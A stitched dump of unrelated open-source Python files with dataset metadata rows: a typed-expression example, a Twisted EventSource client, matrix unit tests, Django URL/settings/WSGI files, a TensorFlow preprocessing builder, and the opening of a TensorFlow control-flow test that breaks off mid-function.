| apache-2.0 | -250,211,113,857,295,550 | 33.602941 | 98 | 0.671058 | false |
avigad/boole | old/expr_examples.py | 1 | 2607 | ################################################################################
#
# expr_examples.py
#
################################################################################
from boole.core.model import *
################################################################################
#
# Examples
#
################################################################################
if __name__ == '__main__':
print "Built-in language:"
print
built_in_language.show()
print
i, j, k = Int('i j k')
x = Const('x', Real)
y, z = Real('y, z')
p, q, r = Bool('p q r')
A = BasicType('A')
B = BasicType('B')
f = (A >> B)('f')
g = Const('g', A * A >> B)
a1, a2 = A('a1 a2')
print 'Global language:'
print
global_language.show()
print
def check(e):
print 'Expression:', e
try:
etype = e.etype()
except TypeError as err:
print 'Type error:', err
else:
print 'Type:', etype
print
check(j)
check(i + j)
check(x)
check(x + i)
check(i + rr(4.2))
check(f(a1))
check(f(a1, a2))
check(g(a1))
check(g(a1, a2))
check(ii(42))
check(rr(42))
adder = Abs([i, j], i + j)
check(adder)
check(adder(i, ii(3)))
check(plus)
check(x ** ii(2) + ii(3) * x + ii(7))
check(j ** ii(2) + ii(3) * j + ii(7))
check(Sum(x ** ii(2), ii(3) * x, ii(7)))
check(Sum(j ** ii(2), ii(3) * j, ii(7)))
check((x * rr(3.0) >= ii(17)) & (p | q))
check(x + p)
check(p & q)
check(And(p,q))
check(And(p, q, r))
check(~And(p, ~q, (r | p)))
check(Forall(x, x == x))
check(Forall([x, y], x == y))
check(Exists([x, y], (rr(0) < x) & (x + y < rr(3))))
L = Language()
set_default_language(L)
m, n, p, q = Int('m n p q')
prime = Const('Prime', Int >> Bool)
even = Const('Even', Int >> Bool)
f = (Int >> Int)('f')
People = EnumType('People', ['Alice', 'Bob', 'Cathy'])
Alice, Bob, Cathy = People.make_constants()
x = People('x')
print 'Language L:'
print
L.show()
print
check (Forall([f, m, n], f(m) == f(n)))
def precond(n):
return (ii(2) < n) & even(n)
def goldbach(n):
return Exists([p,q], (precond(n)) >>
(prime(p) & prime(q) & (p + q == n)))
Goldbach = Forall(n, goldbach(n))
check(Goldbach)
check(Forall(x, (x == Alice) | (x == Bob) | (x == Cathy)))
check(Forall(x, (x == Alice) | (x == Bob)))
| apache-2.0 | -8,128,380,361,066,723,000 | 23.364486 | 80 | 0.392789 | false |
warner/petmail | src/petmail/eventsource.py | 1 | 7209 | from twisted.python import log, failure
from twisted.internet import reactor, defer, protocol
from twisted.application import service
from twisted.protocols import basic
from twisted.web.client import Agent, ResponseDone
from twisted.web.http_headers import Headers
from .eventual import eventually
class EventSourceParser(basic.LineOnlyReceiver):
delimiter = "\n"
def __init__(self, handler):
self.current_field = None
self.current_lines = []
self.handler = handler
self.done_deferred = defer.Deferred()
def connectionLost(self, why):
if why.check(ResponseDone):
why = None
self.done_deferred.callback(why)
def dataReceived(self, data):
# exceptions here aren't being logged properly, and tests will hang
# rather than halt. I suspect twisted.web._newclient's
# HTTP11ClientProtocol.dataReceived(), which catches everything and
# responds with self._giveUp() but doesn't log.err.
try:
basic.LineOnlyReceiver.dataReceived(self, data)
except:
log.err()
raise
def lineReceived(self, line):
if not line:
# blank line ends the field
self.fieldReceived(self.current_field,
"\n".join(self.current_lines))
self.current_field = None
self.current_lines[:] = []
return
if self.current_field is None:
self.current_field, data = line.split(": ", 1)
self.current_lines.append(data)
else:
self.current_lines.append(line)
def fieldReceived(self, name, data):
self.handler(name, data)
class EventSourceError(Exception):
pass
# es = EventSource(url, handler)
# d = es.start()
# es.cancel()
class EventSource: # TODO: service.Service
def __init__(self, url, handler, when_connected=None):
self.url = url
self.handler = handler
self.when_connected = when_connected
self.started = False
self.cancelled = False
self.proto = EventSourceParser(self.handler)
def start(self):
assert not self.started, "single-use"
self.started = True
a = Agent(reactor)
d = a.request("GET", self.url,
Headers({"accept": ["text/event-stream"]}))
d.addCallback(self._connected)
return d
def _connected(self, resp):
if resp.code != 200:
raise EventSourceError("%d: %s" % (resp.code, resp.phrase))
if self.when_connected:
self.when_connected()
#if resp.headers.getRawHeaders("content-type") == ["text/event-stream"]:
resp.deliverBody(self.proto)
if self.cancelled:
self.kill_connection()
return self.proto.done_deferred
def cancel(self):
self.cancelled = True
if not self.proto.transport:
# _connected hasn't been called yet, but that self.cancelled
# should take care of it when the connection is established
def kill(data):
# this should kill it as soon as any data is delivered
raise ValueError("dead")
self.proto.dataReceived = kill # just in case
return
self.kill_connection()
def kill_connection(self):
if (hasattr(self.proto.transport, "_producer")
and self.proto.transport._producer):
# This is gross and fragile. We need a clean way to stop the
# client connection. p.transport is a
# twisted.web._newclient.TransportProxyProducer , and its
# ._producer is the tcp.Port.
self.proto.transport._producer.loseConnection()
else:
log.err("get_events: unable to stop connection")
# oh well
#err = EventSourceError("unable to cancel")
try:
self.proto.done_deferred.callback(None)
except defer.AlreadyCalledError:
pass
class Connector:
# behave enough like an IConnector to appease ReconnectingClientFactory
def __init__(self, res):
self.res = res
def connect(self):
self.res._maybeStart()
def stopConnecting(self):
self.res._stop_eventsource()
class ReconnectingEventSource(service.MultiService,
protocol.ReconnectingClientFactory):
def __init__(self, baseurl, connection_starting, handler):
service.MultiService.__init__(self)
# we don't use any of the basic Factory/ClientFactory methods of
# this, just the ReconnectingClientFactory.retry, stopTrying, and
# resetDelay methods.
self.baseurl = baseurl
self.connection_starting = connection_starting
self.handler = handler
# IService provides self.running, toggled by {start,stop}Service.
# self.active is toggled by {,de}activate. If both .running and
# .active are True, then we want to have an outstanding EventSource
# and will start one if necessary. If either is False, then we don't
# want one to be outstanding, and will initiate shutdown.
self.active = False
self.connector = Connector(self)
self.es = None # set we have an outstanding EventSource
self.when_stopped = [] # list of Deferreds
def isStopped(self):
return not self.es
def startService(self):
service.MultiService.startService(self) # sets self.running
self._maybeStart()
def stopService(self):
# clears self.running
d = defer.maybeDeferred(service.MultiService.stopService, self)
d.addCallback(self._maybeStop)
return d
def activate(self):
assert not self.active
self.active = True
self._maybeStart()
def deactivate(self):
assert self.active # XXX
self.active = False
return self._maybeStop()
def _maybeStart(self):
if not (self.active and self.running):
return
self.continueTrying = True
url = self.connection_starting()
self.es = EventSource(url, self.handler, self.resetDelay)
d = self.es.start()
d.addBoth(self._stopped)
def _stopped(self, res):
self.es = None
# we might have stopped because of a connection error, or because of
# an intentional shutdown.
if self.active and self.running:
# we still want to be connected, so schedule a reconnection
if isinstance(res, failure.Failure):
log.err(res)
self.retry() # will eventually call _maybeStart
return
# intentional shutdown
self.stopTrying()
for d in self.when_stopped:
eventually(d.callback, None)
self.when_stopped = []
def _stop_eventsource(self):
if self.es:
eventually(self.es.cancel)
def _maybeStop(self, _=None):
self.stopTrying() # cancels timer, calls _stop_eventsource()
if not self.es:
return defer.succeed(None)
d = defer.Deferred()
self.when_stopped.append(d)
return d
| mit | 1,099,797,958,269,554,300 | 34.165854 | 80 | 0.609793 | false |
anilpai/leetcode | Tests/test_matrix.py | 1 | 1516 | from unittest import TestCase
from Matrix.MatrixInSpiral import Solution as a
from Matrix.MatrixRotate90deg import Solution as b
from Matrix.RotateMatrix import Solution as c
class TestSolution(TestCase):
def test_spiralmatrix(self):
r = a()
matrix = [
[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16]
]
self.assertListEqual(r.SpiralMatrix(matrix), [1, 2, 3, 4, 8, 12, 16, 15, 14, 13, 9, 5, 6, 7, 11, 10],'Spiral Matrix')
def test_matrixRotate(self):
r = b()
matrix = [
[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16]
]
self.assertListEqual(r.Rotate90Clock(matrix), [[13, 9, 5, 1], [14, 10, 6, 2], [15, 11, 7, 3], [16, 12, 8, 4]], 'Rotate 90 clockwise')
self.assertListEqual(r.Rotate90CounterClock(matrix), [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], 'Rotate 90 anti-clockwise')
def test_matrixMove(self):
r = c()
matrix = [
[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16]
]
self.assertListEqual(r.rotateMatrixClockwise(matrix), [[5, 1, 2, 3], [9, 10, 6, 4], [13, 11, 7, 8], [14, 15, 16, 12]], 'Rotate one step clockwise')
self.assertListEqual(r.rotateMatrixCounterClockwise(matrix), [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], 'Rotate one step anti-clockwise') | mit | -5,891,117,889,782,187,000 | 38.921053 | 167 | 0.509235 | false |
boblefrag/lolyx | lolyx/urls.py | 1 | 1605 | # -*- coding: utf-8 -*- pylint: disable-msg=R0801
#
# Copyright (c) 2013 Rodolphe Quiédeville <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from django.contrib import admin
from django.conf.urls import patterns, include, url
from django.views.generic import RedirectView
from django.core.urlresolvers import reverse_lazy
# Uncomment the next two lines to enable the admin:
admin.autodiscover()
urlpatterns = patterns(
'',
url(r'^admin/', include(admin.site.urls)),
url(r'^accounts/', include('registration.urls')),
url(r'^cv/', include('lolyx.resume.urls')),
url(r'^offres/', include('lolyx.resume.urls')),
url(r'^accounts/profile/$', 'lolyx.llx.views.profile'),
url(r'^$', 'lolyx.llx.views.home', name='home'),
url(r'^search/cv/$', RedirectView.as_view(url=reverse_lazy('resume'))),
# TODO: Use reverse_lazy and not hard the path
url(r'^search/cv/date.php$', RedirectView.as_view(url='/cv/date/')),
)
| gpl-3.0 | 8,413,431,553,604,031,000 | 42.351351 | 75 | 0.700748 | false |
JanMalte/secondhandshop_server | src/secondhandshop_server/wsgi.py | 1 | 1582 | """
WSGI config for Second-Hand-Shop Server project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "jajaja.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "secondhandshop_server.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| mit | 1,794,648,453,947,780,000 | 40.631579 | 81 | 0.790771 | false |
tensorflow/models | research/object_detection/builders/preprocessor_builder.py | 1 | 18154 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Builder for preprocessing steps."""
import tensorflow.compat.v1 as tf
from object_detection.core import preprocessor
from object_detection.protos import preprocessor_pb2
def _get_step_config_from_proto(preprocessor_step_config, step_name):
"""Returns the value of a field named step_name from proto.
Args:
preprocessor_step_config: A preprocessor_pb2.PreprocessingStep object.
step_name: Name of the field to get value from.
Returns:
result_dict: a sub proto message from preprocessor_step_config which will be
later converted to a dictionary.
Raises:
ValueError: If field does not exist in proto.
"""
for field, value in preprocessor_step_config.ListFields():
if field.name == step_name:
return value
raise ValueError('Could not get field %s from proto!' % step_name)
def _get_dict_from_proto(config):
"""Helper function to put all proto fields into a dictionary.
For many preprocessing steps, there's an trivial 1-1 mapping from proto fields
to function arguments. This function automatically populates a dictionary with
the arguments from the proto.
Protos that CANNOT be trivially populated include:
* nested messages.
* steps that check if an optional field is set (ie. where None != 0).
* protos that don't map 1-1 to arguments (ie. list should be reshaped).
* fields requiring additional validation (ie. repeated field has n elements).
Args:
config: A protobuf object that does not violate the conditions above.
Returns:
result_dict: |config| converted into a python dictionary.
"""
result_dict = {}
for field, value in config.ListFields():
result_dict[field.name] = value
return result_dict
# A map from a PreprocessingStep proto config field name to the preprocessing
# function that should be used. The PreprocessingStep proto should be parsable
# with _get_dict_from_proto.
PREPROCESSING_FUNCTION_MAP = {
'normalize_image':
preprocessor.normalize_image,
'random_pixel_value_scale':
preprocessor.random_pixel_value_scale,
'random_image_scale':
preprocessor.random_image_scale,
'random_rgb_to_gray':
preprocessor.random_rgb_to_gray,
'random_adjust_brightness':
preprocessor.random_adjust_brightness,
'random_adjust_contrast':
preprocessor.random_adjust_contrast,
'random_adjust_hue':
preprocessor.random_adjust_hue,
'random_adjust_saturation':
preprocessor.random_adjust_saturation,
'random_distort_color':
preprocessor.random_distort_color,
'random_crop_to_aspect_ratio':
preprocessor.random_crop_to_aspect_ratio,
'random_black_patches':
preprocessor.random_black_patches,
'random_jpeg_quality':
preprocessor.random_jpeg_quality,
'random_downscale_to_target_pixels':
preprocessor.random_downscale_to_target_pixels,
'random_patch_gaussian':
preprocessor.random_patch_gaussian,
'rgb_to_gray':
preprocessor.rgb_to_gray,
'scale_boxes_to_pixel_coordinates':
(preprocessor.scale_boxes_to_pixel_coordinates),
'subtract_channel_mean':
preprocessor.subtract_channel_mean,
'convert_class_logits_to_softmax':
preprocessor.convert_class_logits_to_softmax,
'adjust_gamma':
preprocessor.adjust_gamma,
}
# A map to convert from preprocessor_pb2.ResizeImage.Method enum to
# tf.image.ResizeMethod.
RESIZE_METHOD_MAP = {
preprocessor_pb2.ResizeImage.AREA: tf.image.ResizeMethod.AREA,
preprocessor_pb2.ResizeImage.BICUBIC: tf.image.ResizeMethod.BICUBIC,
preprocessor_pb2.ResizeImage.BILINEAR: tf.image.ResizeMethod.BILINEAR,
preprocessor_pb2.ResizeImage.NEAREST_NEIGHBOR: (
tf.image.ResizeMethod.NEAREST_NEIGHBOR),
}
def get_random_jitter_kwargs(proto):
return {
'ratio':
proto.ratio,
'jitter_mode':
preprocessor_pb2.RandomJitterBoxes.JitterMode.Name(proto.jitter_mode
).lower()
}
def build(preprocessor_step_config):
"""Builds preprocessing step based on the configuration.
Args:
preprocessor_step_config: PreprocessingStep configuration proto.
Returns:
function, argmap: A callable function and an argument map to call function
with.
Raises:
ValueError: On invalid configuration.
"""
step_type = preprocessor_step_config.WhichOneof('preprocessing_step')
if step_type in PREPROCESSING_FUNCTION_MAP:
preprocessing_function = PREPROCESSING_FUNCTION_MAP[step_type]
step_config = _get_step_config_from_proto(preprocessor_step_config,
step_type)
function_args = _get_dict_from_proto(step_config)
return (preprocessing_function, function_args)
if step_type == 'random_horizontal_flip':
config = preprocessor_step_config.random_horizontal_flip
return (preprocessor.random_horizontal_flip,
{
'keypoint_flip_permutation': tuple(
config.keypoint_flip_permutation) or None,
'probability': config.probability or None,
})
if step_type == 'random_vertical_flip':
config = preprocessor_step_config.random_vertical_flip
return (preprocessor.random_vertical_flip,
{
'keypoint_flip_permutation': tuple(
config.keypoint_flip_permutation) or None,
'probability': config.probability or None,
})
if step_type == 'random_rotation90':
config = preprocessor_step_config.random_rotation90
return (preprocessor.random_rotation90,
{
'keypoint_rot_permutation': tuple(
config.keypoint_rot_permutation) or None,
'probability': config.probability or None,
})
if step_type == 'random_crop_image':
config = preprocessor_step_config.random_crop_image
return (preprocessor.random_crop_image,
{
'min_object_covered': config.min_object_covered,
'aspect_ratio_range': (config.min_aspect_ratio,
config.max_aspect_ratio),
'area_range': (config.min_area, config.max_area),
'overlap_thresh': config.overlap_thresh,
'clip_boxes': config.clip_boxes,
'random_coef': config.random_coef,
})
if step_type == 'random_pad_image':
config = preprocessor_step_config.random_pad_image
min_image_size = None
if (config.HasField('min_image_height') !=
config.HasField('min_image_width')):
raise ValueError('min_image_height and min_image_width should be either '
'both set or both unset.')
if config.HasField('min_image_height'):
min_image_size = (config.min_image_height, config.min_image_width)
max_image_size = None
if (config.HasField('max_image_height') !=
config.HasField('max_image_width')):
raise ValueError('max_image_height and max_image_width should be either '
'both set or both unset.')
if config.HasField('max_image_height'):
max_image_size = (config.max_image_height, config.max_image_width)
pad_color = config.pad_color or None
if pad_color:
if len(pad_color) != 3:
tf.logging.warn('pad_color should have 3 elements (RGB) if set!')
pad_color = tf.cast([x for x in config.pad_color], dtype=tf.float32)
return (preprocessor.random_pad_image,
{
'min_image_size': min_image_size,
'max_image_size': max_image_size,
'pad_color': pad_color,
})
if step_type == 'random_absolute_pad_image':
config = preprocessor_step_config.random_absolute_pad_image
max_height_padding = config.max_height_padding or 1
max_width_padding = config.max_width_padding or 1
pad_color = config.pad_color or None
if pad_color:
if len(pad_color) != 3:
tf.logging.warn('pad_color should have 3 elements (RGB) if set!')
pad_color = tf.cast([x for x in config.pad_color], dtype=tf.float32)
return (preprocessor.random_absolute_pad_image,
{
'max_height_padding': max_height_padding,
'max_width_padding': max_width_padding,
'pad_color': pad_color,
})
if step_type == 'random_crop_pad_image':
config = preprocessor_step_config.random_crop_pad_image
min_padded_size_ratio = config.min_padded_size_ratio
if min_padded_size_ratio and len(min_padded_size_ratio) != 2:
raise ValueError('min_padded_size_ratio should have 2 elements if set!')
max_padded_size_ratio = config.max_padded_size_ratio
if max_padded_size_ratio and len(max_padded_size_ratio) != 2:
raise ValueError('max_padded_size_ratio should have 2 elements if set!')
pad_color = config.pad_color or None
if pad_color:
if len(pad_color) != 3:
tf.logging.warn('pad_color should have 3 elements (RGB) if set!')
pad_color = tf.cast([x for x in config.pad_color], dtype=tf.float32)
kwargs = {
'min_object_covered': config.min_object_covered,
'aspect_ratio_range': (config.min_aspect_ratio,
config.max_aspect_ratio),
'area_range': (config.min_area, config.max_area),
'overlap_thresh': config.overlap_thresh,
'clip_boxes': config.clip_boxes,
'random_coef': config.random_coef,
'pad_color': pad_color,
}
if min_padded_size_ratio:
kwargs['min_padded_size_ratio'] = tuple(min_padded_size_ratio)
if max_padded_size_ratio:
kwargs['max_padded_size_ratio'] = tuple(max_padded_size_ratio)
return (preprocessor.random_crop_pad_image, kwargs)
if step_type == 'random_resize_method':
config = preprocessor_step_config.random_resize_method
return (preprocessor.random_resize_method,
{
'target_size': [config.target_height, config.target_width],
})
if step_type == 'resize_image':
config = preprocessor_step_config.resize_image
method = RESIZE_METHOD_MAP[config.method]
return (preprocessor.resize_image,
{
'new_height': config.new_height,
'new_width': config.new_width,
'method': method
})
if step_type == 'random_self_concat_image':
config = preprocessor_step_config.random_self_concat_image
return (preprocessor.random_self_concat_image, {
'concat_vertical_probability': config.concat_vertical_probability,
'concat_horizontal_probability': config.concat_horizontal_probability
})
if step_type == 'ssd_random_crop':
config = preprocessor_step_config.ssd_random_crop
if config.operations:
min_object_covered = [op.min_object_covered for op in config.operations]
aspect_ratio_range = [(op.min_aspect_ratio, op.max_aspect_ratio)
for op in config.operations]
area_range = [(op.min_area, op.max_area) for op in config.operations]
overlap_thresh = [op.overlap_thresh for op in config.operations]
clip_boxes = [op.clip_boxes for op in config.operations]
random_coef = [op.random_coef for op in config.operations]
return (preprocessor.ssd_random_crop,
{
'min_object_covered': min_object_covered,
'aspect_ratio_range': aspect_ratio_range,
'area_range': area_range,
'overlap_thresh': overlap_thresh,
'clip_boxes': clip_boxes,
'random_coef': random_coef,
})
return (preprocessor.ssd_random_crop, {})
if step_type == 'autoaugment_image':
config = preprocessor_step_config.autoaugment_image
return (preprocessor.autoaugment_image, {
'policy_name': config.policy_name,
})
if step_type == 'drop_label_probabilistically':
config = preprocessor_step_config.drop_label_probabilistically
return (preprocessor.drop_label_probabilistically, {
'dropped_label': config.label,
'drop_probability': config.drop_probability,
})
if step_type == 'remap_labels':
config = preprocessor_step_config.remap_labels
return (preprocessor.remap_labels, {
'original_labels': config.original_labels,
'new_label': config.new_label
})
if step_type == 'ssd_random_crop_pad':
config = preprocessor_step_config.ssd_random_crop_pad
if config.operations:
min_object_covered = [op.min_object_covered for op in config.operations]
aspect_ratio_range = [(op.min_aspect_ratio, op.max_aspect_ratio)
for op in config.operations]
area_range = [(op.min_area, op.max_area) for op in config.operations]
overlap_thresh = [op.overlap_thresh for op in config.operations]
clip_boxes = [op.clip_boxes for op in config.operations]
random_coef = [op.random_coef for op in config.operations]
min_padded_size_ratio = [tuple(op.min_padded_size_ratio)
for op in config.operations]
max_padded_size_ratio = [tuple(op.max_padded_size_ratio)
for op in config.operations]
pad_color = [(op.pad_color_r, op.pad_color_g, op.pad_color_b)
for op in config.operations]
return (preprocessor.ssd_random_crop_pad,
{
'min_object_covered': min_object_covered,
'aspect_ratio_range': aspect_ratio_range,
'area_range': area_range,
'overlap_thresh': overlap_thresh,
'clip_boxes': clip_boxes,
'random_coef': random_coef,
'min_padded_size_ratio': min_padded_size_ratio,
'max_padded_size_ratio': max_padded_size_ratio,
'pad_color': pad_color,
})
return (preprocessor.ssd_random_crop_pad, {})
if step_type == 'ssd_random_crop_fixed_aspect_ratio':
config = preprocessor_step_config.ssd_random_crop_fixed_aspect_ratio
if config.operations:
min_object_covered = [op.min_object_covered for op in config.operations]
area_range = [(op.min_area, op.max_area) for op in config.operations]
overlap_thresh = [op.overlap_thresh for op in config.operations]
clip_boxes = [op.clip_boxes for op in config.operations]
random_coef = [op.random_coef for op in config.operations]
return (preprocessor.ssd_random_crop_fixed_aspect_ratio,
{
'min_object_covered': min_object_covered,
'aspect_ratio': config.aspect_ratio,
'area_range': area_range,
'overlap_thresh': overlap_thresh,
'clip_boxes': clip_boxes,
'random_coef': random_coef,
})
return (preprocessor.ssd_random_crop_fixed_aspect_ratio, {})
if step_type == 'ssd_random_crop_pad_fixed_aspect_ratio':
config = preprocessor_step_config.ssd_random_crop_pad_fixed_aspect_ratio
kwargs = {}
aspect_ratio = config.aspect_ratio
if aspect_ratio:
kwargs['aspect_ratio'] = aspect_ratio
min_padded_size_ratio = config.min_padded_size_ratio
if min_padded_size_ratio:
if len(min_padded_size_ratio) != 2:
raise ValueError('min_padded_size_ratio should have 2 elements if set!')
kwargs['min_padded_size_ratio'] = tuple(min_padded_size_ratio)
max_padded_size_ratio = config.max_padded_size_ratio
if max_padded_size_ratio:
if len(max_padded_size_ratio) != 2:
raise ValueError('max_padded_size_ratio should have 2 elements if set!')
kwargs['max_padded_size_ratio'] = tuple(max_padded_size_ratio)
if config.operations:
kwargs['min_object_covered'] = [op.min_object_covered
for op in config.operations]
kwargs['aspect_ratio_range'] = [(op.min_aspect_ratio, op.max_aspect_ratio)
for op in config.operations]
kwargs['area_range'] = [(op.min_area, op.max_area)
for op in config.operations]
kwargs['overlap_thresh'] = [op.overlap_thresh for op in config.operations]
kwargs['clip_boxes'] = [op.clip_boxes for op in config.operations]
kwargs['random_coef'] = [op.random_coef for op in config.operations]
return (preprocessor.ssd_random_crop_pad_fixed_aspect_ratio, kwargs)
if step_type == 'random_square_crop_by_scale':
config = preprocessor_step_config.random_square_crop_by_scale
return preprocessor.random_square_crop_by_scale, {
'scale_min': config.scale_min,
'scale_max': config.scale_max,
'max_border': config.max_border,
'num_scales': config.num_scales
}
if step_type == 'random_scale_crop_and_pad_to_square':
config = preprocessor_step_config.random_scale_crop_and_pad_to_square
return preprocessor.random_scale_crop_and_pad_to_square, {
'scale_min': config.scale_min,
'scale_max': config.scale_max,
'output_size': config.output_size,
}
if step_type == 'random_jitter_boxes':
config = preprocessor_step_config.random_jitter_boxes
kwargs = get_random_jitter_kwargs(config)
return preprocessor.random_jitter_boxes, kwargs
raise ValueError('Unknown preprocessing step.')
| apache-2.0 | 2,135,707,827,955,755,500 | 39.979684 | 80 | 0.640961 | false |
tobegit3hub/deep_recommend_system | http_service/restful_server/settings.py | 1 | 3216 | """
Django settings for restful_server project.
Generated by 'django-admin startproject' using Django 1.9.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '5jeg*%=e7r7*=z*f-5+uz(l3wbe3&1_#306wc6iry!u4shd7)-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'restful_server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'restful_server.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME':
'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| apache-2.0 | 7,750,119,693,354,985,000 | 26.02521 | 83 | 0.684701 | false |
xodus7/tensorflow | tensorflow/python/kernel_tests/control_flow_ops_py_test.py | 1 | 124988 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OiR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-long-lambda
"""Tests for tensorflow.ops.control_flow_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import time
import unittest
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import cond_v2 # pylint: disable=unused-import
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import gen_logging_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
# pylint: disable=unused-import
import tensorflow.python.ops.tensor_array_grad
# pylint: enable=unused-import
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
from tensorflow.python.util import nest
def check_consumers(graph):
"""Sanity check on the consumer list of the tensors."""
consumer_count = {}
for op in graph.get_operations():
for v in op.inputs:
cnt = consumer_count.get(v, 0)
consumer_count[v] = cnt + 1
for k, v in consumer_count.items():
